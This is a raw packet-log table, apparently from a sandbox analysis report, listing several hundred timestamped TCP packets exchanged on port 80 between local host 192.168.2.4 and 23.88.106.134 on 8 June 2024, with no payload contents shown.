Jun 8, 2024 20:22:07.156452894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156471968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.156490088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.156519890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161039114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161068916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161120892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161149025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161164045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161192894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161214113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161231995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161329031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161381006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161384106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161433935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161433935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161473989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161483049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161523104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161524057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161559105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161570072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161592960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161607981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161627054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.161642075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.161674023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162106037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162139893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162158966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162183046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162192106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162225962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162242889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162275076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162278891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162331104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162332058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162364960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162380934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162399054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162424088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162435055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162446022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162470102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162484884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162504911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162520885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162539005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162556887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162589073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162590981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162625074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162647009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162657976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162666082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162692070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162708044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162728071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162744045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162760973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162780046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162795067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162811041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162827015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162842989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162861109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162875891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162894964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162911892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162928104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162940979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162961960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.162976027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.162997007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163011074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163031101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163045883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163065910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163079977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163100004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163115978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163147926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163149118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163182974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163197041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163217068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163230896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163250923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163265944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163300037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163305044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163337946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163355112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163384914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163389921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163423061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163439035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163456917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163472891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163491011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163506031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163527966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163539886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163562059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163578033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163597107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163610935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163630009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163645029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163665056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163681030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163713932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163716078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163750887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163768053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163783073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163799047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163816929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163829088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163851023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163868904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163888931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163907051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163923025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.163938046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163970947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.163976908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164024115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164028883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164062977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164077044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164096117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164112091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164144039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164149046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164182901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164196014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164220095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164230108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164254904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164269924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164289951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164300919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164324999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164340019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164357901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164372921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164408922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164410114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164446115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164459944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164479017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164506912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164531946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164544106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164566994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164582014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164601088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164616108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164634943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164649963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164685011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164686918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164721012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164736032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164767027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164781094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164799929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164815903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164848089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164850950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164884090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164901018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164917946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164931059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164951086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.164968967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.164997101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165004015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165052891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165055037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165096045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165110111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165129900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165147066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165167093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165179014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165200949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165215015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165235043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165250063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165268898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165285110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165302992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165318012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165335894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165352106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165374994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165381908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165409088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165425062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165442944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165461063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165477037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165493011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165524960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165529013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165560961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165575027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165595055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165608883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165627956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165642977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165674925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165678978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165712118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165728092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165745974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165760994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165780067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165793896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165817022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165827990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165851116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165865898 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165884018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165895939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165916920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165932894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165951014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.165963888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.165983915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166002035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166069031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166084051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166101933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166117907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166136980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166151047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166169882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166188002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166203022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166218996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166237116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166253090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166273117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166286945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166310072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166323900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166342974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166361094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166377068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166393042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166409969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166425943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166444063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166459084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166492939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166493893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166539907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166543961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166574001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166589975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166608095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166625977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166640997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166656971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166675091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166688919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166707039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166723013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166739941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166754961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166774035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166789055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166807890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166824102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166841030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166855097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166873932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166888952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166908979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166924953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166941881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166958094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.166975975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.166990995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167010069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167026997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167047024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167058945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167076111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167097092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167109013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167120934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167144060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167157888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167179108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167193890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167212963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167227030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167247057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167263031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167282104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167296886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167327881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167332888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167366982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167382002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167399883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167413950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167433977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167448997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167478085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167484999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167519093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167532921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167551994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167567968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167599916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167602062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167638063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167649984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167673111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167685986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167706013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167720079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167741060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167753935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167774916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167789936 CEST	49731	80	192.168.2.4	23.88.106.134
